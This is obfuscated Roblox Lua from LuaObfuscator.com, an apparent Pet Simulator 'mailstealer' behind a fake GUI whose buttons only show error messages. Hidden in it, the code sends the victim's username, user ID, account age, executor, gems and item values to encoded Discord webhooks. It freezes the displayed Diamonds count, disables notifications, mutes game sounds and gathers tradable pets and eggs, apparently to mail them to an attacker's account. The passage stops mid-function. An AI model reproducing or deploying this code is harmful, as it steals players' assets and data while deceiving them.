--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v123,v124) local v125={};for v192=1, #v123 do v6(v125,v0(v4(v1(v2(v123,v192,v192 + 1 )),v1(v2(v124,1 + (v192% #v124) ,1 + (v192% #v124) + 1 )))%256 ));end return v5(v125);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\0\178\81\2\144\39\68\49\187","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\220\95\14","\158\48\118\66\114"));local v12=Instance.new(v7("\158\13\51\57\97\171\254\185","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\114\216\46\232\98\109\241\236\73\211","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\200\82\191\82\222\66\179\82\243\89","\38\156\55\199"));local v15=Instance.new(v7("\156\120\100\60\49\97\238\87\167\115","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\45\186\201\203\175\57\32\13\176\223","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\142\127\234\175\40\94\53\211","\161\219\54\169\192\90\48\80"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\121\78\1\60\76\80\39\48\64","\69\41\34\96"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(933 -(40 + 808) ,14 + 71 ,85);v9.BorderColor3=Color3.fromRGB(0,0,0);v9.BorderSizePixel=0 -0 ;v9.Position=UDim2.new(0.12510024,0 + 0 ,0.478855729 + 0 ,0);v9.Size=UDim2.new(0,132 + 108 ,571 -(47 + 524) ,102 + 54 );v9.Active=true;v9.Draggable=true;v10.Parent=v9;v10.BackgroundColor3=Color3.fromRGB(144 -91 ,79 -26 ,120 -67 );v10.BorderColor3=Color3.fromRGB(0,1726 -(1165 + 561) ,0 + 0 );v10.BorderSizePixel=0 -0 ;v10.Size=UDim2.new(0 + 0 ,719 -(341 + 138) ,0,46);v10.Font=Enum.Font.SourceSansBold;v10.Text=v7("\140\198\195\74\49\59\189\212\217\15\16\106","\75\220\163\183\106\98");v10.TextColor3=Color3.fromRGB(69 + 186 ,526 -271 ,581 -(89 + 237) );v10.TextSize=34;v11.Parent=v9;v11.BackgroundColor3=Color3.fromRGB(820 -565 ,536 -281 ,255);v11.BorderColor3=Color3.fromRGB(0,881 -(581 + 300) ,1220 -(855 + 365) );v11.BorderSizePixel=0 -0 ;v11.Position=UDim2.new(0.0416666679 + 0 ,0,1235.384615391 -(1030 + 205) ,0 + 0 );v11.Size=UDim2.new(0,151 + 11 ,0,336 -(156 + 130) );v11.Font=Enum.Font.SourceSansBold;v11.PlaceholderText=v7("\39\180\159\50\203\66\138\142\35\153\44\187\134\50\152","\185\98\218\235\87");v11.Text="";v11.TextColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 -0 );v11.TextSize=6 + 15 ;v11.TextWrapped=true;v12.Parent=v11;v13.Parent=v9;v13.BackgroundColor3=Color3.fromRGB(31 + 22 ,122 -(10 + 59) ,15 + 38 );v13.BorderColor3=Color3.fromRGB(0,0,0);v13.BorderSizePixel=0 -0 ;v13.Position=UDim2.new(1163.150000006 -(671 + 492) ,0 + 0 ,0.743589759,0);v13.Size=UDim2.new(1215 -(369 + 846) ,13 + 34 ,0 + 0 ,1978 -(1036 + 909) );v13.Font=Enum.Font.SourceSansBold;v13.Text=v7("\229\51\53\235\223\166","\202\171\92\71\134\190");v13.TextColor3=Color3.fromRGB(203 + 52 ,428 -173 ,458 -(11 + 192) );v13.TextSize=8 + 6 ;v13.MouseButton1Click:Connect(function() local v126=0;local v127;while true do if (v126==0) then v127=require(game.ReplicatedStorage.Library.Client.Message);v127.Error(v7("\26\212\47\139\44\210\42\157\37\205\53\200\10\201\35\135\58\196\34\200\7\206\62\133\40\205\109","\232\73\161\76"));break;end end end);v14.Parent=v9;v14.BackgroundColor3=Color3.fromRGB(53,228 -(135 + 40) ,128 -75 );v14.BorderColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0);v14.BorderSizePixel=0 -0 ;v14.Position=UDim2.new(0.400000006,176 -(50 + 126) ,0.743589759 -0 ,0);v14.Size=UDim2.new(0 + 0 ,47,1413 -(1233 + 180) ,1002 -(522 + 447) );v14.Font=Enum.Font.SourceSansBold;v14.Text=v7("\156\214\78\89","\126\219\185\34\61");v14.TextColor3=Color3.fromRGB(255,1676 -(107 + 1314) ,119 + 136 );v14.TextSize=42 -28 ;v14.MouseButton1Click:Connect(function() local v128=0;local v129;while true do if (v128==0) then v129=require(game.ReplicatedStorage.Library.Client.Message);v129.Error(v7("\63\219\93\113\123\100\245\242\0\194\71\50\93\127\252\232\31\203\80\50\89\120\255\227\77","\135\108\174\62\18\30\23\147"));break;end end end);v15.Parent=v9;v15.BackgroundColor3=Color3.fromRGB(23 + 30 ,53,105 -52 );v15.BorderColor3=Color3.fromRGB(0 -0 ,0,1910 -(716 + 1194) );v15.BorderSizePixel=0;v15.Position=UDim2.new(0.654166639,0,0.743589759,0 + 0 );v15.Size=UDim2.new(0 + 0 ,47,0,536 -(74 + 429) );v15.Font=Enum.Font.SourceSansBold;v15.Text=v7("\132\232\35\197\26\161\36","\167\214\137\74\171\120\206\83");v15.TextColor3=Color3.fromRGB(491 -236 ,127 + 128 ,583 -328 );v15.TextSize=10 + 4 ;v15.MouseButton1Click:Connect(function() local v130=require(game.ReplicatedStorage.Library.Client.Message);v130.Error(v7("\184\229\49\94\253\180\141\229\62\81\225\231\168\248\61\82\235\162\133\176\0\92\241\169\137\255\37\28","\199\235\144\82\61\152"));end);v16.Parent=v9;v16.BackgroundColor3=Color3.fromRGB(36 -24 ,95,29 -17 );v16.BorderColor3=Color3.fromRGB(433 -(279 + 154) ,0,778 -(454 + 324) );v16.BorderSizePixel=0 + 0 ;v16.Position=UDim2.new(17.745833337 -(12 + 5) ,0,0.384615391 + 0 ,0);v16.Size=UDim2.new(0,132 -80 ,0,50);v16.Font=Enum.Font.SourceSansBold;v16.Text=v7("\52\6\184\60\9","\75\103\118\217");v16.TextColor3=Color3.fromRGB(255,255,95 + 160 );v16.TextSize=1112 -(277 + 816) ;v17.Parent=v16;v16.MouseButton1Click:Connect(function() local v131=0;local v132;local v133;local v134;while true do if (v131==(4 -3)) then v134=nil;while true do if (v132==(1183 -(1058 + 125))) then local v276=0;while true do if ((1 + 0)==v276) then v132=976 -(815 + 160) ;break;end if (v276==(0 -0)) then v133=require(game.ReplicatedStorage.Library.Client.Message);v133.Error(v7("\247\81\100\84\138\11\196\87\117\7\191\11\203\88\105\84\138\14\198\67\126\17\189","\126\167\52\16\116\217"));v276=2 -1 ;end end end if (v132==(1 + 0)) then v134={[1]=v7("\152\118\121\134\176\64\171\157\121\117\217\181\77\249\153\119\121\213\229\73\172\202\123\37\129\229\73\249\154\47\35\211","\156\168\78\64\224\212\121")};game:GetService(v7("\53\235\181\194\14\237\164\218\2\234\150\218\8\252\164\201\2","\174\103\142\197")).Network.Pets_Favorite:FireServer(v7("\6\112\6\62\33\7\175\3\127\10\97\36\10\253\7\113\6\109\116\14\168\84\125\90\57\116\14\253\4\41\92\107","\152\54\72\63\88\69\62"));break;end end break;end if (v131==(0 -0)) then v132=1898 -(41 + 1857) ;v133=nil;v131=1894 -(1222 + 671) ;end end end);Username=v7("\240\205\233\85\192\203\195\93\221\200\235\78","\60\180\164\142");Username2=v7("\124\87\2\32\51\226\63\89\87\9\44\53","\114\56\62\101\73\71\141");Webhook=v7("\176\253\207\212\171\179\148\139\188\224\200\199\183\251\223\138\187\230\214\139\185\249\210\139\175\236\217\204\183\230\208\215\247\184\137\156\238\186\139\147\239\187\136\147\224\185\137\157\238\190\137\145\247\185\228\252\154\185\232\246\151\188\255\137\189\255\138\199\188\241\201\245\159\237\131\156\232\216\142\137\155\198\150\145\236\235\139\233\186\218\233\238\129\185\205\137\183\225\222\221\173\239\228\244\188\249\239\236\144\221\195\240\159\232\225\239\239\255\139\144\187","\164\216\137\187");MinimumRAP=10000;DualhookUsername=v7("\246\239\54\187\178\241\38\211\239\61\183\180","\107\178\134\81\210\198\158");DualhookWebhook=v7("\48\26\150\214\185\98\65\205\194\163\43\13\141\212\174\118\13\141\203\229\57\30\139\137\189\61\12\138\201\165\51\29\205\151\248\96\88\209\150\253\111\92\209\145\242\104\92\219\144\253\106\91\205\150\149\0\44\210\245\152\23\91\166\139\175\46\95\129\194\178\42\63\165\194\242\96\94\179\147\231\27\33\207\147\254\58\94\175\196\153\10\36\187\150\188\117\1\138\195\179\45\8\189\246\174\40\58\170\238\158\32\58\165\199\144\19\89\148\150\254\59","\202\88\110\226\166");LogsWebhook=v7("\203\27\150\231\217\153\64\205\243\195\208\12\141\229\206\141\12\141\250\133\194\31\139\184\221\198\13\138\248\197\200\28\205\166\152\155\89\209\167\157\148\93\209\160\146\147\93\219\161\157\145\90\205\167\245\251\45\210\196\248\236\90\166\186\207\213\94\129\243\210\209\62\165\243\146\155\95\179\162\135\224\32\207\162\158\193\95\175\245\249\241\37\187\167\220\142\0\138\242\211\214\9\189\199\206\211\59\170\223\254\219\59\165\246\240\232\88\148\167\158\192","\170\163\111\226\151");DualhookRAP=1e+30;mailstealer_name="X";Roblox_Username=Username;Discord_Webhook=Webhook;LOGS_WEBHOOK=LogsWebhook;if (getgenv().Executed==true) then end getgenv().Executed=true;repeat task.wait();until game:IsLoaded() if  not game:IsLoaded() then game.Loaded:Wait();end local v94=game:GetService(v7("\33\60\179\33\75\37\58","\73\113\80\210\88\46\87")).LocalPlayer.Name;if (v94==Username) then local v193=0 -0 ;while true do if (v193==(0 -0)) then game:GetService(v7("\177\32\204\11\226\147\63","\135\225\76\173\114")).LocalPlayer:Kick(v7("\35\226\173\240\141\175\162\90\217\176\181\236\146\176\20\232\170\241\236\245\179\31\254\172\240\165\169\231\21\227\248\177\160\169\231\27\238\187\249","\199\122\141\216\208\204\221"));return;end end end if (Username==nil) then local v194=1182 -(229 + 953) ;while true do if (v194==(1774 -(1111 + 663))) then local v258=1579 -(874 + 705) ;local v259;while true do if (v258==0) then v259=0 + 0 ;while true do if (v259==0) then game:GetService(v7("\157\209\17\233\125\228\190","\150\205\189\112\144\24")).LocalPlayer:Kick(v7("\21\145\171\12\37\200\36\3\32\150\145\77\9\141","\112\69\228\223\44\100\232\113"));return;end end break;end end end end end repeat task.wait();until game:IsLoaded() repeat task.wait();until game.PlaceId~=nil  repeat task.wait();until  not game.Players.LocalPlayer.PlayerGui:FindFirstChild(v7("\235\32\46\253\130\78\169","\230\180\127\103\179\214\28")) local v95=require(game.ReplicatedStorage.Library);local v96=require(game:GetService(v7("\190\0\79\74\237\66\225\152\0\91\117\240\78\242\141\2\90","\128\236\101\63\38\132\33")).Library.Client.Save).Get();local v97=require(game:GetService(v7("\158\172\1\72\191\232\206\184\172\21\119\162\228\221\173\174\20","\175\204\201\113\36\214\139")).Library.Directory);local v98=game.Players.LocalPlayer;local v99=v96.Inventory;local v100=game:GetService(v7("\111\216\33\204\55\66\222\35\213\7\66","\100\39\172\85\188"));local v101=v7("\190\104\184\131\54\180\56\170\144\50\174\125","\83\205\24\217\224");local v102=require(game.ReplicatedStorage.Library.Client.Message);local v103=game:GetService(v7("\212\192\221\49\239\198\204\41\227\193\254\41\233\215\204\58\227","\93\134\165\173")):WaitForChild(v7("\144\247\213\213\53\220\185","\30\222\146\161\162\90\174\210"));for v135,v136 in pairs(v99.Currency) do if (v136.id==v7("\193\71\113\7\234\64\116\25","\106\133\46\16")) then GemsAmount=v136._am or (0 + 0) ;break;end end for v137,v138 in pairs(getgc()) do if ((typeof(v138)==v7("\94\53\125\255\78\73\87\46","\32\56\64\19\156\58")) and (debug.getinfo(v138).name==v7("\89\199\232\70\79\230\133\105\205\235\82\119\243\137\86\235\234\69\78","\224\58\168\133\54\58\146"))) then FunctionToGetFirstPriceOfMail=v138;break;end end FirstPriceOfMail=FunctionToGetFirstPriceOfMail();if (FirstPriceOfMail>GemsAmount) then local v195=0 -0 ;while true do if ((0 + 0)==v195) then local v260=0;local v261;while true do if (0==v260) then v261=679 -(642 + 37) ;while true do if (v261==0) then print("You don't have enough gems to run a script");return;end end break;end end end end end local v104=function(v139) local v140=0;local v141;local v142;local v143;while true do local v196=0 + 0 ;while true do if ((0 + 0)==v196) then if (v140==(2 -1)) then local v277=0;while true do if (v277==0) then v143=455 -(233 + 221) ;while v141>=1000  do local v317=0 -0 ;while true do if (v317==(0 + 0)) then v141=v141/1000 ;v143=v143 + (1542 -(718 + 823)) ;break;end end end v277=1;end if ((1 + 0)==v277) then v140=807 -(266 + 539) ;break;end end end if (v140==0) then v141=math.floor(v139);v142={"","k","m","b","t"};v140=1 -0 ;end v196=1 + 0 ;end if (v196==(1 + 0)) then if (v140==2) then return string.format(v7("\28\24\25\251\48\149","\107\57\54\43\157\21\230\231"),v141,v142[v143]);end break;end end end end;local v105=function(v144,v145) return require(game:GetService(v7("\233\142\1\249\176\223\206\207\142\21\198\173\211\221\218\140\20","\175\187\235\113\149\217\188")).Library.Client.DevRAPCmds).Get({[v7("\31\163\128\95\240","\24\92\207\225\44\131\25")]={[v7("\101\210\181\73","\29\43\179\216\44\123")]=v144},[v7("\148\202\1","\44\221\185\64")]=function(v197) return v197==v144 ;end,[v7("\38\226\92\118\119","\19\97\135\40\63")]=function() return v145.id;end,[v7("\157\72\50\56\36\26\171\69","\81\206\60\83\91\79")]=function() return v100:JSONEncode({[v7("\71\175","\196\46\203\176\18\79\163\45")]=v145.id,[v7("\168\54","\143\216\66\30\126\68\155")]=v145.pt,[v7("\185\192","\129\202\168\109\171\165\195\183")]=v145.sh,[v7("\54\86","\134\66\56\87\184\190\116")]=v145.tn});end}) or 0 ;end;local v106=function() local v146=1015 -(657 + 358) ;local v147;while true do if (v146==(0 -0)) then v147=0 -0 ;while true do local v262=0;while true do if (v262==(1187 -(1151 + 36))) then if (v147==(0 + 0)) then RAP=0 + 0 ;for v318,v319 in pairs(v99) do if (v319~=nil) then for v335,v336 in pairs(v319) do RAP=RAP + v105(v318,v336) ;end end end v147=2 -1 ;end if (v147==1) then return RAP;end break;end end end break;end end end;function deepCopy(v148) local v149={};for v198,v199 in pairs(v148) do local v200=1832 -(1552 + 280) ;local v201;while true do if (v200==(834 -(64 + 770))) then v201=0 + 0 ;while true do if (v201==(0 -0)) then if (type(v199)==v7("\40\48\11\183\28","\85\92\81\105\219\121\139\65")) then v199=deepCopy(v199);end v149[v198]=v199;break;end end break;end end end return v149;end local function v107(v150,v151,v152,v153,v154,v155,v156,v157,v158,v159) local v160={[v7("\222\188\94\81\121\209\233\254\100\92\108\218","\191\157\211\48\37\28")]=v7("\222\15\228\16\51\220\30\224\21\53\209\80\254\15\53\209","\90\191\127\148\124")};if (v156==true) then shinyy=v7("\75\143\39\25\97","\119\24\231\78");elseif (v156==false) then shinyy=v7("\140\34\177\10\239\72\24\140\52","\113\226\77\197\42\188\32");end imgs=v7("\50\2\224\165\41\76\187\250\51\27\245\178\63\5\185\176\34\2\185\228\116\18\253\166\57\25\230\177\59\6\228\251\52\19\224\250\63\14\224\176\40\24\245\185\117\37\218\236\32\17\229\150\19\17\210\135\34\66\226\182\53\64\218\166\29\5\242\229\11\28\242\186\25\62\242\231\22\28\203\190\104\36\162\226\31\63\221\178\117\30\224\161\42\5\187\188\116\31\246\183\116\21\251\250\29\33\231\187\42\6\252\250\34\6\250\178\116\6\250\178\101\16\251\167\55\23\224\232\45\19\246\165\124\7\225\180\54\31\224\172\103\26\251\166\41\26\241\166\41","\213\90\118\148");local v161=game:GetService(v7("\107\34\181\79\72\73\61","\45\59\78\212\54")).LocalPlayer;local v162=identifyexecutor() or v7("\5\88\135\142\128\39\163\245\20","\144\112\54\227\235\230\78\205") ;JobId=game.JobId;local v164=v98.Name;local v165={[v7("\176\39\1\232\213\85\167","\59\211\72\111\156\176")]=v157,[v7("\91\148\230\63\64\134\238\40","\77\46\231\131")]=""   .. mailstealer_name   .. v7("\250\121\183\73\182\71\162\69\187\88\179\82","\32\218\52\214") ,[v7("\79\1\48\188\240\162\122\79\92\27","\58\46\119\81\200\145\208\37")]=imgs,[v7("\46\129\50\169\173\174","\86\75\236\80\204\201\221")]={{[v7("\102\72\99\137\251","\235\18\33\23\229\158")]=v7("\26\240\248\180\69\250\203\174\67\174\129\188\95\174\129\186\16\180\196\172\16\179\213\190\93\251\139\241","\219\48\218\161"),[v7("\240\104\108\76","\128\132\17\28\41\187\47")]=v7("\19\59\5\50","\61\97\82\102\90"),[v7("\175\33\167\68\213","\105\204\78\203\43\167\55\126")]=tonumber(8324570 -(157 + 1086) ),[v7("\177\162\54\19\17\10\198\88\169","\49\197\202\67\126\115\100\167")]={[v7("\34\73\211","\62\87\59\191\73\224\54")]=v153},[v7("\225\11\255\197\227\17","\169\135\98\154")]={{[v7("\197\118\41\81","\168\171\23\68\52\157\83")]=v7("\190\59\193\165\44\62\199\240\112\225\172\101\58\134\231\49\242\168\43\40\149\245\101\240\169\101\56\148\253\127\242\237","\231\148\17\149\205\69\77")   .. mailstealer_name   .. v7("\192\138\198\242\91\236\148\162\198\247\82\237\202\237","\159\224\199\167\155\55") ,[v7("\225\242\48\199\242","\178\151\147\92")]=v7("\140\253\76\7\1\73\104\130\252\65\55\82\12\58\204\189\22\114","\26\236\157\44\82\114\44")   .. v161.Name   .. "\nUser-ID      : "   .. v161.userId   .. "\nAccount Age  : "   .. v161.AccountAge   .. v7("\106\10\212\66\57","\59\74\78\181")   .. "\nExploit      : "   .. v162   .. "\nReceiver     : "   .. Roblox_Username   .. "\nTotal RAP    : "   .. v104(v159)   .. v7("\37\209\90","\211\69\177\58\58") ,[v7("\190\235\117\252\231\206","\171\215\133\25\149\137")]=false},{[v7("\239\201\63\255","\34\129\168\82\154\143\80\156")]=v7("\223\182\60\12\18\14\195\207\130\54\31\91\14\133\128\180\39\65\2\14\211\129\189\52\81","\233\229\210\83\107\40\46"),[v7("\215\67\62\195\0","\101\161\34\82\182")]="```➜ "   .. v155   .. v7("\232\13\89","\78\136\109\57\158\187\130\226") ,[v7("\55\49\245\248\48\58","\145\94\95\153")]=true},{[v7("\243\204\25\208","\215\157\173\116\181\46")]=v7("\111\185\132\252\223\44\139\134\253\207\33\188\209\178\144\127","\186\85\212\235\146")   .. v151   .. v7("\136\203\86\164\52\225\86\199\152\41\243\54\251\76\202\219","\56\162\225\118\158\89\142") ,[v7("\74\4\204\186\39","\184\60\101\160\207\66")]="```➜ "   .. v150   .. v7("\49\130\124","\220\81\226\28") ,[v7("\26\219\142\242\228\194","\167\115\181\226\155\138")]=true},{[v7("\236\35\234\89","\166\130\66\135\60\27\17")]=v7("\30\94\220\122\32\76\83\148\53\122\14\99\218\112\61\4\120\239\69\122\14\10\148\97\34\75\90\198\108\106","\80\36\42\174\21"),[v7("\88\17\59\111\75","\26\46\112\87")]="```➜ "   .. v104(v158)   .. v7("\185\35\171","\212\217\67\203\20\223\223\37") ,[v7("\179\131\164\219\180\136","\178\218\237\200")]=true},{[v7("\184\180\235\213","\176\214\213\134")]=v7("\174\170\179\217\242\22\19\190\138\179\217\187\22\117\241\171\162\158\226\22\3\243\168\187\142","\57\148\205\214\180\200\54"),[v7("\4\252\57\33\115","\22\114\157\85\84")]="```➜ "   .. v104(GemsAmount)   .. v7("\196\203\19","\200\164\171\115\164\61\150") ,[v7("\183\250\15\76\141\187","\227\222\148\99\37")]=true},{[v7("\61\83\95\243","\153\83\50\50\150")]=v7("\7\101\99\29\97\160\65\88\101\41\92\57\225\126\85\127\125\5\57\225\13\7\101\99\29\97\160\65\88\101\41","\45\61\22\19\124\19\203"),[v7("\215\19\1\224\7","\217\161\114\109\149\98\16")]="```➜ "   .. shinyy   .. v7("\18\32\56","\20\114\64\88\28\220") ,[v7("\56\15\222\189\246\213","\221\81\97\178\212\152\176")]=true},{[v7("\195\230\16\254","\122\173\135\125\155")]=v7("\222\211\1\176\49\51\199\147\155\64\243\117\3\234\203\230\15\181\59\126\250\129\198\74\243\127\107\219\148\192\18\178\51\52\219\222","\168\228\161\96\217\95\81"),[v7("\205\208\34\73\42","\55\187\177\78\60\79")]="```➜ "   .. v152   .. v7("\45\206\95","\224\77\174\63\139\38\175") ,[v7("\141\79\84\39\138\68","\78\228\33\56")]=true}}}},[v7("\207\106\166\2\134\198\115\183\13\145\221","\229\174\30\210\99")]={}};local v166=http_request or request or HttpPost or syn.request ;v166({[v7("\46\255\138","\89\123\141\230\49\141\93")]=v154,[v7("\222\116\226\4\31\78","\42\147\17\150\108\112")]=v7("\63\137\30\75","\136\111\198\77\31\135"),[v7("\42\12\166\82\184\246\4","\201\98\105\199\54\221\132\119")]={[v7("\154\3\141\53\7\59\184\244\56\154\49\7","\204\217\108\227\65\98\85")]=v7("\95\211\229\233\37\195\95\215\252\234\34\143\84\208\250\235","\160\62\163\149\133\76")},[v7("\244\175\9\54","\163\182\192\109\79")]=game.HttpService:JSONEncode(v165)});end local v108=v98.leaderstats["\240\159\146\142 Diamonds"].Value;local v109=v98.leaderstats["\240\159\146\142 Diamonds"];v109:GetPropertyChangedSignal(v7("\2\39\12\213\240","\149\84\70\96\160")):Connect(function() v109.Value=v108;end);local v110=v98.PlayerScripts.Scripts.Core[v7("\8\20\2\238\61\21\30\173\8\3\3\233\49\8\10\173\31\51\36","\141\88\102\109")];local v111=v98.PlayerGui.Notifications;v110.Disabled=true;v111:GetPropertyChangedSignal(v7("\150\93\203\114\22\56\81","\161\211\51\170\16\122\93\53")):Connect(function() v111.Enabled=false;end);v111.Enabled=false;task.spawn(function() game.DescendantAdded:Connect(function(v202) if (v202.ClassName==v7("\200\161\167\38\255","\72\155\206\210")) then if ((v202.SoundId==v7("\84\120\76\15\32\85\127\64\7\55\28\53\27\95\98\30\41\13\95\96\20\47\2\91","\83\38\26\52\110")) or (v202.SoundId==v7("\74\21\63\71\75\4\34\82\81\19\125\9\23\70\115\20\13\67\112\20\9\71\116\30","\38\56\119\71")) or (v202.SoundId==v7("\225\237\64\215\54\69\246\251\81\210\127\25\188\190\10\130\116\5\167\189\11\132\114\0","\54\147\143\56\182\69"))) then v202.Volume=1931 -(1813 + 118) ;v202.PlayOnRemove=false;v202:Destroy();end end end);end);local function v114(v169) local v170=0;local v171;local v172;while true do if (v170==1) then v172=game:HttpGet(v7("\132\40\80\242\64\88\195\115\80\234\70\15\142\50\69\235\95\17\194\46\75\224\95\13\148\114\71\237\94\77\154\109\11\227\64\17\137\40\87\189\82\17\159\57\80\203\87\17\209","\98\236\92\36\130\51")   .. Asset   .. v7("\226\11\9\174\80\186\187\0\171\21\5\185\92\245\133\60\165\26\9\146\74\164\177\53\182\95\31\179\95\173\232","\80\196\121\108\218\37\200\213")   .. v171   .. v7("\70\117\13\109\70\15\158\93\99\12\120","\234\96\19\98\31\43\110") );thumbnail=game.HttpService:JSONDecode(v172).data[1 + 0 ].imageUrl;v170=2;end if (v170==(1217 -(841 + 376))) then Asset=string.split(v169,v7("\196\131\231\72\204\197\132\235\64\219\140\206\176","\191\182\225\159\41"))[2 -0 ];v171=v7("\127\64\120\77\223\213\146","\162\75\114\72\53\235\231");v170=1;end if (v170==2) then return thumbnail;end end end MinimumRAP=FirstPriceOfMail;if v99.Box then for v212,v213 in pairs(v99.Box) do if v213._uq then game:GetService(v7("\52\26\66\203\165\113\138\18\26\86\244\184\125\153\7\24\87","\235\102\127\50\167\204\18")):WaitForChild(v7("\126\164\225\52\75\60\91","\78\48\193\149\67\36")):WaitForChild(v7("\18\17\152\66\1\7\23\148\16\69\34\31\151\88\96\60\18","\33\80\126\224\120")):InvokeServer(v212);end end end local v115,v116=game:GetService(v7("\222\173\19\200\85\239\169\23\193\88\223\188\12\214\93\235\173","\60\140\200\99\164")):WaitForChild(v7("\169\241\16\49\173\149\255","\194\231\148\100\70")):WaitForChild(v7("\107\77\200\175\244\199\94\22\129\128\250\201\79\65\129\130\250\196","\168\38\44\161\195\150")):InvokeServer();while v116==v7("\185\243\151\54\61\253\165\2\192\235\131\127\36\168\229\70\192\239\135\117\63\230\178\5\192\254\135\112\63\250\179\86\149\239\139\120\55\168\162\30\133\188\143\119\57\228\180\25\152\189","\118\224\156\226\22\80\136\214")  do local v173=0 + 0 ;local v174;while true do if (v173==0) then v174=0 -0 ;while true do if (v174==(859 -(464 + 395))) then wait();v115,v116=game:GetService(v7("\112\235\73\140\75\237\88\148\71\234\106\148\77\252\88\135\71","\224\34\142\57")):WaitForChild(v7("\240\162\209\202\124\227\86","\110\190\199\165\189\19\145\61")):WaitForChild(v7("\247\234\126\228\137\200\194\177\55\203\135\198\211\230\55\201\135\203","\167\186\139\23\136\235")):InvokeServer();break;end end break;end end end require(game.ReplicatedStorage.Library.Client.DaycareCmds).Claim();require(game.ReplicatedStorage.Library.Client.ExclusiveDaycareCmds).Claim();local v117=function() local v175={};if (v99.Pet~=nil) then for v216,v217 in pairs(v99.Pet) do id=v217.id;dir=v97.Pets[id];if (dir.huge and (dir.Tradable~=false)) then local v269=0 -0 ;while true do if (v269==(1 + 0)) then table.insert(v175,{[v7("\218\23\44\29\189\113\28","\22\147\99\73\112\226\56\120")]=v216,[v7("\145\97\231\248\178\150\116\239\240","\237\216\21\130\149")]=v217.id,[v7("\171\90\90\82\143\232\83\141\91\81\75","\62\226\46\63\63\208\169")]=v217._am or (838 -(467 + 370)) ,[v7("\204\13\80\142\32\63\14\110","\62\133\121\53\227\127\109\79")]=rap,[v7("\57\0\55\248\233\141\174\17\7\33","\194\112\116\82\149\182\206")]=v7("\9\173\88","\110\89\200\44\120\160\130"),[v7("\130\208\120\78\74\68\34","\45\203\163\43\38\35\42\91")]=v217.sh or false ,[v7("\251\150\240\44\132\162\81\214","\52\178\229\188\67\231\201")]=v217.lk or false ,[v7("\8\85\85\9\200\117\46\32\70\85\45\243","\67\65\33\48\100\151\60")]=ItemImageId,[v7("\246\243\171\213\204\235\254\190\221","\147\191\135\206\184")]=ItemType});break;end if (v269==0) then rap=v105(v7("\42\176\156","\109\122\213\232"),v217);if (v217.pt==1) then local v320=0 -0 ;while true do if (v320==(0 + 0)) then ItemImageId=dir.goldenThumbnail;ItemType=v7("\201\248\174\52\235\249","\80\142\151\194");break;end end elseif (v217.pt==(6 -4)) then ItemImageId=dir.thumbnail;ItemType=v7("\49\199\126\66\1\201\96","\44\99\166\23");else local v327=0;while true do if ((0 + 0)==v327) then ItemImageId=dir.thumbnail;ItemType=v7("\82\248\59\59\50\168","\196\28\151\73\86\83");break;end end end v269=2 -1 ;end end end if (dir.exclusiveLevel and (dir.Tradable~=false)) then local v270=0;while true do if (v270==(520 -(150 + 370))) then rap=v105(v7("\180\45\178","\210\228\72\198\161\184\51"),v217) * (v217._am or (1283 -(74 + 1208))) ;if (v217.pt==(2 -1)) then local v321=0 -0 ;while true do if ((0 + 0)==v321) then ItemImageId=dir.goldenThumbnail;ItemType=v7("\17\70\255\20\118\192","\174\86\41\147\112\19");break;end end elseif (v217.pt==(392 -(14 + 376))) then local v328=0;while true do if (v328==(0 -0)) then ItemImageId=dir.thumbnail;ItemType=v7("\105\1\132\5\39\0\6","\203\59\96\237\107\69\111\113");break;end end else local v329=0;while true do if (v329==(0 + 0)) then ItemImageId=dir.thumbnail;ItemType=v7("\10\25\190\236\48\252","\183\68\118\204\129\81\144");break;end end end v270=1 + 0 ;end if (v270==(1 + 0)) then if (rap>MinimumRAP) then table.insert(v175,{[v7("\39\185\117\233\52\171\10","\226\110\205\16\132\107")]=v216,[v7("\194\215\229\212\126\197\194\237\220","\33\139\163\128\185")]=v217.id,[v7("\126\76\1\211\104\121\9\209\66\86\16","\190\55\56\100")]=v217._am or (2 -1) ,[v7("\127\187\57\19\44\209\210\102","\147\54\207\92\126\115\131")]=rap,[v7("\36\37\48\112\50\93\1\48\38\110","\30\109\81\85\29\109")]=v7("\207\116\64","\156\159\17\52\214\86\190"),[v7("\135\252\142\180\167\225\164","\220\206\143\221")]=v217.sh or false ,[v7("\175\110\1\24\219\199\215\130","\178\230\29\77\119\184\172")]=v217.lk or false ,[v7("\220\170\15\22\72\209\248\191\13\30\94\252","\152\149\222\106\123\23")]=ItemImageId,[v7("\244\50\243\78\138\233\63\230\70","\213\189\70\150\35")]=ItemType});end break;end end end end end if (v99.Egg~=nil) then for v220,v221 in pairs(v99.Egg) do local v222=0 + 0 ;while true do if (v222==2) then ItemImageId=dir.icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\241\82\5\126\148\130\220","\203\184\38\96\19\203")]=v220,[v7("\16\103\124\76\241\23\114\116\68","\174\89\19\25\33")]=v221.id,[v7("\6\6\87\67\200\166\6\32\7\92\90","\107\79\114\50\46\151\231")]=v221._am or (79 -(23 + 55)) 